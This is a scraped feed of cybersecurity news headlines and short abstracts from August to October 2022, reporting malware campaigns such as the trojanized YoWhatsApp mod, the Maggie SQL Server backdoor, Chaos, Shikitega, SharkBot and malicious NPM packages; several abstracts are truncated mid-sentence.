An unofficial version of the popular WhatsApp messaging app called YoWhatsApp has been observed deploying an Android trojan known as Triada. The goal of the malware is to steal the keys that "allow the use of a WhatsApp account without the app ," Kaspersky said in a new report. "If the keys are stolen, a user of a malicious WhatsApp mod can lose control over their account." YoWhatsApp offers the ability for users to lock chats, send messages to unsaved numbers, and customize the app with a variety of theming options. It's also said to share overlaps with other modded WhatsApp clients such as FMWhatsApp and HeyMods. The Russian cybersecurity company said it found the malicious functionality in YoWhatsApp version 2.22.11.75. Typically spread through fraudulent ads on Snaptube and Vidmate, the app, upon installation, requests the victims to grant it permissions to access SMS messages, enabling the malware to enroll them to paid subscriptions without theirThe Hacker News
October 12, 2022
Unofficial WhatsApp Android app caught stealing users’ accounts Full Text
Abstract
A new version of an unofficial WhatsApp Android application named 'YoWhatsApp' has been found stealing access keys for users' accounts.BleepingComputer
October 11, 2022
Experts analyzed the evolution of the Emotet supply chain Full Text
Abstract
VMware researchers have analyzed the supply chain behind the Emotet malware reporting that its operators are continually shifting their tactics, techniques, and procedures to avoid detection.Security Affairs
October 11, 2022
Hacking group POLONIUM uses ‘Creepy’ malware against Israel Full Text
Abstract
Security researchers reveal previously unknown malware used by the cyber espionage hacking group 'POLONIUM,' threat actors who appear to target Israeli organizations exclusively.BleepingComputer
October 10, 2022
Researchers Detail Malicious Tools Used by Cyberespionage Group Earth Aughisky Full Text
Abstract
A new piece of research has detailed the increasingly sophisticated nature of the malware toolset employed by an advanced persistent threat (APT) group named Earth Aughisky . "Over the last decade, the group has continued to make adjustments in the tools and malware deployments on specific targets located in Taiwan and, more recently, Japan," Trend Micro disclosed in a technical profile last week. Earth Aughisky, also known as Taidoor , is a cyber espionage group that's known for its ability to abuse legitimate accounts, software, applications, and other weaknesses in the network design and infrastructure for its own ends. While the Chinese threat actor has been known to primarily target organizations in Taiwan, victimology patterns observed towards late 2017 indicate an expansion to Japan. The most commonly targeted industry verticals include government, telcom, manufacturing, heavy, technology, transportation, and healthcare. Attack chains mounted by the groupThe Hacker News
October 10, 2022
Maggie Backdoor Eats Up Hundreds of SQL Servers Around the Globe Full Text
Abstract
A new malware strain named Maggie is targeting Microsoft SQL servers and has already backdoored hundreds of machines globally. The malware boasts simple TCP redirection functionality that can allow a remote hacker to connect to any IP address the infected MS-SQL server can reach. The malware’s capa ... Read MoreCyware Alerts - Hacker News
October 10, 2022
RatMilad Spyware Attempts To Penetrate Middle Eastern Enterprises Full Text
Abstract
Mobile security firm Zimperium uncovered a new Android spyware, dubbed RatMilad, sneaking into users’ mobile devices for the Middle Eastern enterprises. Researchers have warned that the malware could be used by cybercriminals for numerous purposes ranging from cyberespionage to eavesdropping on vic ... Read MoreCyware Alerts - Hacker News
October 09, 2022
Solana Phantom security update NFTs push password-stealing malware Full Text
Abstract
Hackers are airdropping NFTs to Solana cryptocurrency owners pretending to be alerts for a new Phantom security update that lead to the installation of password-stealing malware and the theft of cryptocurrency wallets.BleepingComputer
October 07, 2022
Facebook Detects 400 Android and iOS Apps Stealing Users Log-in Credentials Full Text
Abstract
Meta Platforms on Friday disclosed that it had identified over 400 malicious apps on Android and iOS that it said targeted online users with the goal of stealing their Facebook login information. "These apps were listed on the Google Play Store and Apple's App Store and disguised as photo editors, games, VPN services, business apps, and other utilities to trick people into downloading them," the social media behemoth said in a report shared with The Hacker News. 42.6% of the rogue apps were photo editors, followed by business utilities (15.4%), phone utilities (14.1%), games (11.7%), VPNs (11.7%), and lifestyle apps (4.4%). Interestingly, a majority of the iOS apps posed as ads manager tools for Meta and its Facebook subsidiary. Besides concealing its malicious nature as a set of seemingly harmless apps, the operators of the scheme also published fake reviews that were designed to offset the negative reviews left by users who may have previously downloaded the appsThe Hacker News
October 07, 2022
LofyGang Distributed ~200 Malicious NPM Packages to Steal Credit Card Data Full Text
Abstract
Multiple campaigns that distributed trojanized and typosquatted packages on the NPM open source repository have been identified as the work of a single threat actor dubbed LofyGang . Checkmarx said it discovered 199 rogue packages totaling thousands of installations, with the group operating for over a year with the goal of stealing credit card data as well as user accounts associated with Discord Nitro, gaming, and streaming services. "LofyGang operators are seen promoting their hacking tools in hacking forums, while some of the tools are shipped with a hidden backdoor," the software security company said in a report shared with The Hacker News prior to its publication. Various pieces of the attack puzzle have already been reported by JFrog , Sonatype , and Kaspersky (which called it LofyLife), but the latest analysis pulls the various operations together under one organizational umbrella that Checkmarx is referring to as LofyGang . Believed to be an organized crThe Hacker News
October 7, 2022
LilithBot Malware, a new MaaS offered by the Eternity Group Full Text
Abstract
Researchers linked the threat actor behind the Eternity malware-as-a-service (MaaS) to a new malware strain called LilithBot. Zscaler researchers linked a recently discovered sample of a new malware called LilithBot to the Eternity group (aka...Security Affairs
October 6, 2022
Detecting fileless malware infections is becoming easier Full Text
Abstract
Without memory analysis capabilities, security teams would be hard-pressed to identify fileless malware because it differs from traditional malware in how it breaches systems.Help Net Security
October 5, 2022
New Maggie malware already infected over 250 Microsoft SQL servers Full Text
Abstract
Hundreds of Microsoft SQL servers all over the world have been infected with a new piece of malware tracked as Maggie. Security researchers Johann Aydinbas and Axel Wauer from the DCSO CyTec have spotted a new piece of malware, named Maggie,...Security Affairs
October 5, 2022
OnionPoison: malicious Tor Browser installer served through a popular Chinese YouTube channel Full Text
Abstract
OnionPoison: researchers reported that an infected Tor Browser installer has been distributed through a popular YouTube channel. Kaspersky researchers discovered that a trojanized version of a Windows installer for the Tor Browser has been distributed...Security Affairs
October 05, 2022
New Android malware ‘RatMilad’ can steal your data, record audio Full Text
Abstract
A new Android spyware named 'RatMilad' was discovered targeting mobile devices in the Middle East, used to spy on victims and steal data.BleepingComputer
October 4, 2022
Malicious Tor Browser spreads through YouTube Full Text
Abstract
One of the libraries bundled with the malicious Tor Browser is infected with spyware that collects various personal data and sends it to a command and control server. It also gives attackers the ability to execute shell commands.Securelist
October 04, 2022
ProxyNotShell – the New Proxy Hell? Full Text
Abstract
Nicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082 that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers. Based on ProxyShell, this new zero-day abuse risk leverage a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 – to permit a remote actor to execute arbitrary code. Despite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities. Meet ProxyNotShell Recorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enableThe Hacker News
October 3, 2022
Trojanized Comm100 Live Chat app installer distributed a JavaScript backdoor Full Text
Abstract
A threat actor used a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike disclosed details of a supply chain attack that involved the use of a trojanized installer for the Comm100...Security Affairs
October 03, 2022
Fake Microsoft Exchange ProxyNotShell exploits for sale on GitHub Full Text
Abstract
Scammers are impersonating security researchers to sell fake proof-of-concept ProxyNotShell exploits for newly discovered Microsoft Exchange zero-day vulnerabilities.BleepingComputer
September 30, 2022
New Malware Families Found Targeting VMware ESXi Hypervisors Full Text
Abstract
Threat actors have been found deploying never-before-seen post-compromise implants in VMware's virtualization software to seize control of infected systems and evade detection. Google's Mandiant threat intelligence division referred to it as a "novel malware ecosystem" that impacts VMware ESXi, Linux vCenter servers, and Windows virtual machines, allowing attackers to maintain persistent access to the hypervisor as well as execute arbitrary commands. The hyperjacking attacks , per the cybersecurity vendor, involved the use of malicious vSphere Installation Bundles ( VIBs ) to sneak in two implants, dubbed VIRTUALPITA and VIRTUALPIE, on the ESXi hypervisors. "It is important to highlight that this is not an external remote code execution vulnerability; the attacker needs admin-level privileges to the ESXi hypervisor before they can deploy malware," Mandiant researchers Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore said in an exhausThe Hacker News
September 30, 2022
Experts uncovered novel Malware persistence within VMware ESXi Hypervisors Full Text
Abstract
Researchers from Mandiant have discovered a novel malware persistence technique within VMware ESXi Hypervisors. Mandiant detailed a novel technique used by malware authors to achieve administrative access within VMware ESXi Hypervisors and take over...Security Affairs
September 29, 2022
A cracked copy of Brute Ratel post-exploitation tool leaked on hacking forums Full Text
Abstract
The Brute Ratel post-exploitation toolkit has been cracked and now is available in the underground hacking and cybercrime communities. Threat actors have cracked the Brute Ratel C4 (BRC4) post-exploitation toolkit and leaked it for free in the cybercrime...Security Affairs
September 29, 2022
Go-based Chaos malware is rapidly growing targeting Windows, Linux and more Full Text
Abstract
A new multifunctional Go-based malware dubbed Chaos is targeting both Windows and Linux systems, experts warn. Researchers from Black Lotus Labs at Lumen Technologies, recently uncovered a multifunctional Go-based malware that was developed to target...Security Affairs
September 29, 2022
New malware backdoors VMware ESXi servers to hijack virtual machines Full Text
Abstract
Hackers have found a new method to establish persistence on VMware ESXi hypervisors to control vCenter servers and virtual machines for Windows and Linux while avoiding detection.BleepingComputer
September 29, 2022
Upgraded Prilex Point-of-Sale malware bypasses credit card security Full Text
Abstract
Security analysts have observed three new versions of Prilex this year, indicating that the authors and operators of the PoS-targeting malware are back to action.BleepingComputer
September 28, 2022
Researchers Warn of New Go-based Malware Targeting Windows and Linux Systems Full Text
Abstract
A new, multi-functional Go-based malware dubbed Chaos has been rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet. "Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through stealing and brute-forcing SSH private keys, as well as launch DDoS attacks," researchers from Lumen's Black Lotus Labs said in a write-up shared with The Hacker News. A majority of the bots are located in Europe, specifically Italy, with other infections reported in China and the U.S., collectively representing "hundreds of unique IP addresses" over a one-month time period from mid-June through mid-July 2022. Written in Chinese and leveraging China-based infrastructure for command-and-control, the botnet joins a long list of malware that are designed to establish persiThe Hacker News
September 28, 2022
Threat actors use Quantum Builder to deliver Agent Tesla malware Full Text
Abstract
The recently discovered malware builder Quantum Builder is being used by threat actors to deliver the Agent Tesla RAT. A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT),...Security Affairs
September 28, 2022
New Chaos malware infects Windows, Linux devices for DDoS attacks Full Text
Abstract
A quickly expanding botnet called Chaos is targeting and infecting Windows and Linux devices to use them for cryptomining and launching DDoS attacks.BleepingComputer
September 27, 2022
New NullMixer dropper infects your PC with a dozen malware families Full Text
Abstract
A new malware dropper named 'NullMixer' is infecting Windows devices with a dozen different malware families simultaneously through fake software cracks promoted on malicious sites in Google Search results.BleepingComputer
September 27, 2022
More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID Full Text
Abstract
This particular attack chain was discovered in early August 2022 and delivered IcedID, also known as Bokbot, as the final payload. This information stealer, IcedID, is well-known malware that has been attacking users since 2019.Palo Alto Networks
September 27, 2022
New NullMixer Malware Campaign Stealing Users’ Payment Data and Credentials Full Text
Abstract
Cybercriminals are continuing to prey on users searching for cracked software by directing them to fraudulent websites hosting weaponized installers that deploy malware called NullMixer on compromised systems. "When a user extracts and executes NullMixer, it drops a number of malware files to the compromised machine," cybersecurity firm Kaspersky said in a Monday report. "It drops a wide variety of malicious binaries to infect the machine with, such as backdoors, bankers, downloaders, spyware, and many others." Besides siphoning users' credentials, address, credit card data, cryptocurrencies, and even Facebook and Amazon account session cookies, what makes NullMixer insidious is its ability to download dozens of trojans at once, significantly widening the scale of the infections. Attack chains typically start when a user attempts to download cracked software from one of the sites, which leads to a password-protected archive that contains an executable filThe Hacker News
September 27, 2022
Agent Tesla RAT Delivered by Quantum Builder With New TTPs Full Text
Abstract
Zscaler ThreatLabz has observed a campaign that delivers Agent Tesla, a .NET-based keylogger and remote access trojan (RAT) active since 2014, using a builder named “Quantum Builder” sold on the dark web.Zscaler
September 27, 2022
Experts Uncover 85 Apps with 13 Million Downloads Involved in Ad Fraud Scheme Full Text
Abstract
As many as 75 apps on Google Play and 10 on Apple App Store have been discovered engaging in ad fraud as part of an ongoing campaign that commenced in 2019. The latest iteration, dubbed Scylla by Online fraud-prevention firm HUMAN Security, follows similar attack waves in August 2019 and late 2020 that go by the codename Poseidon and Charybdis, respectively. Prior to their removal from the app storefronts, the apps had been collectively installed more than 13 million times. The original Poseidon operation comprised over 40 Android apps that were designed to display ads out of context or hidden from the view of the device user. Charybdis, on the other hand, was an improvement over the former by making use of code obfuscation tactics to target advertising platforms. Scylla presents the latest adaption of the scheme in that it expands beyond Android to make a foray into the iOS ecosystem for the first time, alongside relying on additional layers of code roundabout using the AllThe Hacker News
September 27, 2022
Erbium info-stealing malware, a new option in the threat landscape Full Text
Abstract
The recently discovered Erbium information-stealer is being distributed as fake cracks and cheats for popular video games. Threat actors behind the new 'Erbium' information-stealing malware are distributing it as fake cracks and cheats for popular...Security Affairs
September 26, 2022
New Erbium password-stealing malware spreads as game cracks, cheats Full Text
Abstract
The new 'Erbium' information-stealing malware is being distributed as fake cracks and cheats for popular video games to steal victims' credentials and cryptocurrency wallets.BleepingComputer
September 26, 2022
NullMixer drops Redline Stealer, SmokeLoader and other malware Full Text
Abstract
The infection vector of NullMixer is based on a ‘User Execution’ malicious link that requires the end user to click on and download a password-protected ZIP/RAR archive with a malicious file that is extracted and executed manually.Securelist
September 26, 2022
Hackers use PowerPoint files for ‘mouseover’ malware delivery Full Text
Abstract
Hackers believed to work for Russia have started using a new code execution technique that relies on mouse movement in Microsoft PowerPoint presentations to trigger a malicious PowerShell script.BleepingComputer
September 26, 2022
Adware on Google Play and Apple Store installed 13 million times Full Text
Abstract
Security researchers have discovered 75 applications on Google Play and another ten on Apple's App Store engaged in ad fraud. Collectively, they add to 13 million installations.BleepingComputer
September 26, 2022
Exmatter exfiltration tool used to implement new extortion tactics Full Text
Abstract
Ransomware operators switch to new extortion tactics by using the Exmatter malware and adding new data corruption functionality. The data extortion landscape is constantly evolving and threat actors are devising new extortion techniques, this is the case...Security Affairs
September 24, 2022
Malicious NPM package discovered in supply chain attack Full Text
Abstract
Researchers with ReversingLabs said the Material Tailwind library is being impersonated for an apparent supply chain attack targeting developers. The team spotted a look-alike NPM package circulating on repositories.Tech Target
September 23, 2022
The Harly Trojan subscriber in Google Play apps Full Text
Abstract
Since 2020 more than 190 apps infected with Harly have been found on Google Play. A conservative estimate of the number of downloads of these apps is 4.8 million, but the actual figure may be even higher.Kaspersky Lab
September 22, 2022
Malicious NPM Package Caught Mimicking Material Tailwind CSS Package Full Text
Abstract
A malicious NPM package has been found masquerading as the legitimate software library for Material Tailwind, once again indicating attempts on the part of threat actors to distribute malicious code in open source software repositories. Material Tailwind is a CSS-based framework advertised by its maintainers as an "easy to use components library for Tailwind CSS and Material Design." "The malicious Material Tailwind npm package, while posing as a helpful development tool, has an automatic post-install script," Karlo Zanki, security researcher at ReversingLabs, said in a report shared with The Hacker News. This script is engineered to download a password-protected ZIP archive file that contains a Windows executable capable of running PowerShell scripts. The rogue package, named material-tailwindcss , has been downloaded 320 times to date, all of which occurred on or after September 15, 2022. In a tactic that's becoming increasingly common, the threatThe Hacker News
September 22, 2022
ChromeLoader Campaign Spreads Several Malware Full Text
Abstract
The multi-stage malware attack chain hijacks the browser and redirects targets to advertising sites, for the threat actors to generate revenue from ad clicks and views.Cyware Alerts - Hacker News
September 20, 2022
IT giants warn of ongoing Chromeloader malware campaigns Full Text
Abstract
VMware and Microsoft are warning of a widespread Chromeloader malware campaign that distributes several malware families. ChromeLoader is a malicious Chrome browser extension, it is classified as a pervasive browser hijacker that modifies browser...Security Affairs
September 19, 2022
VMware, Microsoft warn of widespread Chromeloader malware attacks Full Text
Abstract
The operators of the Chromeloader adware are evolving their attack methods and gradually transforming the low-risk tool into a dangerous malware loader, seen dropping ransomware in some cases.BleepingComputer
September 16, 2022
Researchers Find Link b/w PrivateLoader and Ruzki Pay-Per-Install Services Full Text
Abstract
Cybersecurity researchers have exposed new connections between a widely used pay-per-install (PPI) malware service known as PrivateLoader and another PPI platform offered by a cybercriminal actor dubbed ruzki. "The threat actor ruzki (aka les0k, zhigalsz) advertises their PPI service on underground Russian-speaking forums and their Telegram channels under the name ruzki or zhigalsz since at least May 2021," SEKOIA said. The cybersecurity firm said its investigations into the twin services led it to conclude that PrivateLoader is the proprietary loader of the ruzki PPI malware service. PrivateLoader, as the name implies, functions as a C++-based loader to download and deploy additional malicious payloads on infected Windows hosts. It's primarily distributed through SEO-optimized websites that claim to provide cracked software. Although it was first documented earlier this February by Intel471, it's said to have been put to use starting as early as May 2021. SThe Hacker News
September 15, 2022
Hackers trojanize PuTTY SSH client to backdoor media company Full Text
Abstract
North Korean hackers are using trojanized versions of the PuTTY SSH client to deploy backdoors on targets' devices as part of a fake Amazon job assessment.BleepingComputer
September 15, 2022
Researchers Warn of Self-Spreading Malware Targeting Gamers via YouTube Full Text
Abstract
Gamers looking for cheats on YouTube are being targeted with links to malicious password-protected archive files designed to install the RedLine Stealer malware and crypto miners on compromised machines. "The videos advertise cheats and cracks and provide instructions on hacking popular games and software," Kaspersky security researcher Oleg Kupreev said in a new report published today. Games mentioned in the videos are APB Reloaded, CrossFire, DayZ, Farming Simulator, Farthest Frontier, FIFA 22, Final Fantasy XIV, Forza, Lego Star Wars, Sniper Elite, and Spider-Man, among others. Downloading the self-extracting RAR archive leads to the execution of Redline Stealer, a coin miner, as well as a number of other binaries that enable the bundle's self-propagation. Specifically, this is achieved by means of an open-source C#-based password stealer that's capable of extracting cookies from browsers, which is then used by the operators to gain unauthorized access toThe Hacker News
September 15, 2022
Experts warn of self-spreading malware targeting gamers looking for cheats on YouTube Full Text
Abstract
Threat actors target gamers looking for cheats on YouTube with the RedLine Stealer information-stealing malware and crypto miners Researchers from Kaspersky have spotted a self-extracting archive, served to gamers looking for cheats on YouTube, that...Security Affairs
September 15, 2022
New malware bundle self-spreads through YouTube gaming videos Full Text
Abstract
A new malware bundle uses victims' YouTube channels to upload malicious video tutorials advertising fake cheats and cracks for popular video games to spread the malicious package further.BleepingComputer
September 14, 2022
GIFShell, a New Tool to Abuse Microsoft Teams GIFs Full Text
Abstract
A cybersecurity consultant has discovered a new attack chain, GIFShell, that leverages GIF images in Microsoft Teams to execute arbitrary commands on the target’s machine. Since the data exfiltration is performed by leveraging Microsoft's own servers, it is challenging to identify the traffic and d ... Read MoreCyware Alerts - Hacker News
September 14, 2022
Researchers Detail OriginLogger RAT — Successor to Agent Tesla Malware Full Text
Abstract
Palo Alto Networks Unit 42 has detailed the inner workings of a malware called OriginLogger , which has been touted as a successor to the widely used information stealer and remote access trojan (RAT) known as Agent Tesla . A .NET based keylogger and remote access, Agent Tesla has had a long-standing presence in the threat landscape, allowing malicious actors to gain remote access to targeted systems and beacon sensitive information to an actor-controlled domain. Known to be used in the wild since 2014, it's advertised for sale on dark web forums and is generally distributed through malicious spam emails as an attachment. In February 2021, cybersecurity firm Sophos disclosed two new variants of the commodity malware (version 2 and 3) that featured capabilities to steal credentials from web browsers, email apps, and VPN clients, as well as use Telegram API for command-and-control. Now according to Unit 42 researcher Jeff White, what has been tagged as AgentTesla version 3The Hacker News
September 14, 2022
Researchers Discover New Linux Variant of ‘SideWalk’ Modular Backdoor Full Text
Abstract
This variant was deployed against a Hong Kong university in February 2021, the same university that had already been targeted by SparklingGoblin during the student protests in May 2020.ESET Security
September 14, 2022
Chinese hackers create Linux version of the SideWalk Windows malware Full Text
Abstract
State-backed Chinese hackers have developed a Linux variant for the SideWalk backdoor used against Windows systems belonging to targets in the academic sector.BleepingComputer
September 13, 2022
Evil Corp Deploys ServHelper Backdoor Via Custom-made Software Panel Full Text
Abstract
Researchers provided insights into TeslaGun, a never-seen-before software control panel, used by the TA505, aka Evil Corp, to deploy the ServHelper backdoor. The ServHelper backdoor, once downloaded, sets up reverse SSH tunnels that allow attackers to access the infected system via RDP. The threat ... Read MoreCyware Alerts - Hacker News
September 10, 2022
New Linux malware combines unusual stealth with a full suite of capabilities Full Text
Abstract
Dubbed Shikitega by the researchers at AT&T Alien Labs who discovered it, the malware is delivered through a multistage infection chain using polymorphic encoding. It also abuses legitimate cloud services to host command-and-control servers.ARS Technica
September 08, 2022
Bumblebee malware adds post-exploitation tool for stealthy infections Full Text
Abstract
A new version of the Bumblebee malware loader has been spotted in the wild, featuring a new infection chain that uses the PowerSploit framework for stealthy reflective injection of a DLL payload into memory.BleepingComputer
September 7, 2022
Experts spotted a new stealthy Linux malware dubbed Shikitega Full Text
Abstract
A new Linux malware dubbed Shikitega leverages a multi-stage infection chain to target endpoints and IoT devices. Researchers from AT&T Alien Labs discovered a new piece of stealthy Linux malware, dubbed Shikitega, that targets endpoints and IoT devices....Security Affairs
September 7, 2022
Malware in House of the Dragon downloads Full Text
Abstract
Cybercriminals abuse popular TV shows for their reach. The criminals load illegal downloads with malware and upload them to torrent and file-sharing websites. House of the Dragon is the latest such show to be targeted.Cyberwarzone
September 07, 2022
New Stealthy Shikitega Malware Targeting Linux Systems and IoT Devices Full Text
Abstract
A new piece of stealthy Linux malware called Shikitega has been uncovered adopting a multi-stage infection chain to compromise endpoints and IoT devices and deposit additional payloads. "An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist," AT&T Alien Labs said in a new report published Tuesday. The findings add to a growing list of Linux malware that has been found in the wild in recent months, including BPFDoor , Symbiote , Syslogk , OrBit , and Lightning Framework . Once deployed on a targeted host, the attack chain downloads and executes the Metasploit's " Mettle " meterpreter to maximize control, exploits vulnerabilities to elevate its privileges, adds persistence on the host via crontab, and ultimately launches a cryptocurrency miner on infected devices. The exact method by which the initial compromise is achieved remains unknown as yet, but what makes ShikitegaThe Hacker News
September 6, 2022
A new Android malware used to spy on the Uyghur Community Full Text
Abstract
Experts spotted new Android spyware that was used by China-linked threat actors to spy on the Uyghur community in China. Researchers from Cyble Research & Intelligence Labs (CRIL) started their investigation after MalwareHunterTeam experts shared...Security Affairs
September 06, 2022
Minecraft is hackers’ favorite game title for hiding malware Full Text
Abstract
Security researchers have discovered that Minecraft is the most heavily abused game title by cybercriminals, who use it to lure unsuspecting players into installing malware.BleepingComputer
September 6, 2022
New Stealthy Malware Dubbed Shikitega Targeting Linux Systems Full Text
Abstract
The malware downloads and executes Metasploit’s “Mettle” meterpreter to maximize its control of infected machines. Shikitega exploits system vulnerabilities to gain high privileges, persist and execute cryptominer.AT&T Cybersecurity
September 06, 2022
New Linux malware evades detection using multi-stage deployment Full Text
Abstract
A new stealthy Linux malware known as Shikitega has been discovered infecting computers and IoT devices with additional payloads.BleepingComputer
September 05, 2022
Fake Antivirus and Cleaner Apps Caught Installing SharkBot Android Banking Trojan Full Text
Abstract
The notorious Android banking trojan known as SharkBot has once again made an appearance on the Google Play Store by masquerading as antivirus and cleaner apps. "This new dropper doesn't rely on Accessibility permissions to automatically perform the installation of the dropper Sharkbot malware," NCC Group's Fox-IT said in a report. "Instead, this new version asks the victim to install the malware as a fake update for the antivirus to stay protected against threats." The apps in question, Mister Phone Cleaner and Kylhavy Mobile Security, have over 60,000 installations between them and are designed to target users in Spain, Australia, Poland, Germany, the U.S., and Austria - Mister Phone Cleaner (com.mbkristine8.cleanmaster, 50,000+ downloads) Kylhavy Mobile Security (com.kylhavy.antivirus, 10,000+ downloads) The droppers are designed to drop a new version of SharkBot, dubbed V2 by Dutch security firm ThreatFabric, which features an updated coThe Hacker News
September 5, 2022
A new SharkBot variant bypassed Google Play checks again Full Text
Abstract
Experts spotted an upgraded version of the SharkBot malware that was uploaded to the official Google Play Store. Fox IT researchers have spotted an upgraded version of a SharkBot dropper that was uploaded to the official Google Play Store. While...Security Affairs
September 5, 2022
New SharkBot Banking Trojan Variant Bypassed Google Play Store Checks Again Full Text
Abstract
The malware was observed targeting the mobile users of banks in Italy, the UK, and the US. The trojan allows to hijack users’ mobile devices and steal funds from online banking and cryptocurrency accounts.Security Affairs
September 04, 2022
SharkBot malware sneaks back on Google Play to steal your logins Full Text
Abstract
A new and upgraded version of the SharkBot malware has returned to Google's Play Store, targeting banking logins of Android users through apps that have tens of thousands of installations.BleepingComputer
September 4, 2022
Alleged Iranian threat actors leak the code of their CodeRAT malware Full Text
Abstract
The author of the remote access trojan (RAT) CodeRAT has leaked the source code of its malware on GitHub. The development team behind the remote access trojan (RAT) CodeRAT has leaked the source code of its malware on GitHub after the SafeBreach...Security Affairs
September 03, 2022
Malware dev open-sources CodeRAT after being exposed Full Text
Abstract
The source code of a remote access trojan (RAT) dubbed 'CodeRAT' has been leaked on GitHub after malware analysts confronted the developer about attacks that used the tool.BleepingComputer
September 2, 2022
The Prynt Stealer malware contains a secret backdoor. Crooks steal data from other cybercriminals Full Text
Abstract
The information-stealing malware Prynt Stealer contains a backdoor that allows stealing the data it has infiltrated from victims. Zscaler researchers discovered Telegram channel-based backdoor in the information stealing malware, Prynt Stealer, which...Security Affairs
September 02, 2022
Dev backdoors own malware to steal data from other hackers Full Text
Abstract
Cybercriminals using Prynt Stealer to collect data from victims are being swindled by the malware developer, who also receives a copy of the info over Telegram messaging service.BleepingComputer
September 02, 2022
Prynt Stealer Contains a Backdoor to Steal Victims’ Data Stolen by Other Cybercriminals Full Text
Abstract
Researchers discovered a private Telegram channel-based backdoor in the information stealing malware, dubbed Prynt Stealer , which its developer added with the intention of secretly stealing a copy of victims' exfiltrated data when used by other cybercriminals. "While this untrustworthy behavior is nothing new in the world of cybercrime, the victims' data end up in the hands of multiple threat actors, increasing the risks of one or more large scale attacks to follow," Zscaler ThreatLabz researchers Atinderpal Singh and Brett Stone-Gross said in a new report. Prynt Stealer, which came to light earlier this April, comes with capabilities to log keystrokes, steal credentials from web browsers, and siphon data from Discord and Telegram. It's sold for $100 for a one-month license and $900 for a lifetime subscription. The cybersecurity firm analysis of Prynt Stealer shows that its codebase is derived from two other open source malware families, AsyncRAT andThe Hacker News
September 02, 2022
New Evidence Links Raspberry Robin Malware to Dridex and Russian Evil Corp Hackers Full Text
Abstract
Researchers have identified functional similarities between a malicious component used in the Raspberry Robin infection chain and a Dridex malware loader, further strengthening the operators' connections to the Russia-based Evil Corp group. The findings suggest that "Evil Corp is likely using Raspberry Robin infrastructure to carry out its attacks," IBM Security X-Force researcher Kevin Henson said in a Thursday analysis. Raspberry Robin (aka QNAP Worm), first discovered by cybersecurity company Red Canary in September 2021, has remained something of a mystery for nearly a year, partly owing to the noticeable lack of post-exploitation activities in the wild. That changed in July 2022 when Microsoft revealed that it observed the FakeUpdates (aka SocGholish) malware being delivered via existing Raspberry Robin infections, with potential connections identified between DEV-0206 and DEV-0243 (aka Evil Corp). The malware is known to be delivered from a compromisedThe Hacker News
August 31, 2022
Experts Find Malicious Cookie Stuffing Chrome Extensions Used by 1.4 Million Users Full Text
Abstract
Five imposter extensions for the Google Chrome web browser masquerading as Netflix viewers and others have been found to track users' browsing activity and profit off retail affiliate programs. "The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website," McAfee researchers Oliver Devane and Vallabh Chole said . "The latter borrows several phrases from another popular extension called GoFullPage." The browser add-ons in question – available via the Chrome Web Store and downloaded 1.4 million times – are as follows - Netflix Party (mmnbenehknklpbendgmgngeaignppnbe) - 800,000 downloads Netflix Party (flijfnhifgdcbhglkneplegafminjnhn) - 300,000 downloads FlipShope – Price Tracker Extension (adikhbfjdbjkhelbdnffogkobkekkkej) - 80,000 downloads Full Page Screenshot Capture – Screenshotting (pojgkmkfincpdkdgjepkmdekcahmckjp) - 200,000 downloads AutoBuy Flash Sales (gbnaThe Hacker News
August 31, 2022
Hackers Hide Malware in Stunning Images Taken by James Webb Space Telescope Full Text
Abstract
A persistent Golang-based malware campaign dubbed GO#WEBBFUSCATOR has leveraged the deep field image taken from NASA's James Webb Space Telescope (JWST) as a lure to deploy malicious payloads on infected systems. The development, revealed by Securonix , points to the growing adoption of Go among threat actors, given the programming language's cross-platform support, effectively allowing the operators to leverage a common codebase to target different operating systems. Go binaries also have the added benefit of rendering reverse engineering a lot more challenging as opposed to malware written in other languages like C++ or C#, not to mention prolong analysis and detection attempts. Phishing emails containing a Microsoft Office attachment act as the entry point for the attack chain that, when opened, retrieves an obfuscated VBA macro, which, in turn, is auto-executed should the recipient enable macros. The execution of the macro results in the download of an image file &quoThe Hacker News
August 31, 2022
GO#WEBBFUSCATOR campaign hides malware in NASA’s James Webb Space Telescope image Full Text
Abstract
A malware campaign tracked as GO#WEBBFUSCATOR used an image taken from NASA's James Webb Space Telescope (JWST) as a lure. Securonix Threat researchers uncovered a persistent Golang-based malware campaign tracked as GO#WEBBFUSCATOR that leveraged...Security Affairs
August 31, 2022
Experts spotted five malicious Google Chrome extensions used by 1.4M users Full Text
Abstract
Researchers spotted 5 malicious Google Chrome extensions used to track users' browsing activity and profit of retail affiliate programs. McAfee researchers discovered five malicious Google Chrome extensions with a total install base of over 1,400,000....Security Affairs
August 30, 2022
Hackers hide malware in James Webb telescope images Full Text
Abstract
Threat analysts have spotted a new malware campaign dubbed 'GO#WEBBFUSCATOR' that relies on phishing emails, malicious documents, and space images from the James Webb telescope to spread malware.BleepingComputer
August 30, 2022
A study on malicious plugins in WordPress Marketplaces Full Text
Abstract
A group of researchers from the Georgia Institute of Technology discovered malicious plugins on tens of thousands of WordPress sites. A team of researchers from the Georgia Institute of Technology has analyzed the backups of more than 400,000 unique...Security Affairs
August 30, 2022
Chrome extensions with 1.4 million installs steal browsing data Full Text
Abstract
Threat analysts at McAfee found five Google Chrome extensions that steal track users' browsing activity. Collectively, the extensions have been downloaded more then 1.4 million times.BleepingComputer
August 29, 2022
Nitrokod crypto miner infected systems across 11 countries since 2019 Full Text
Abstract
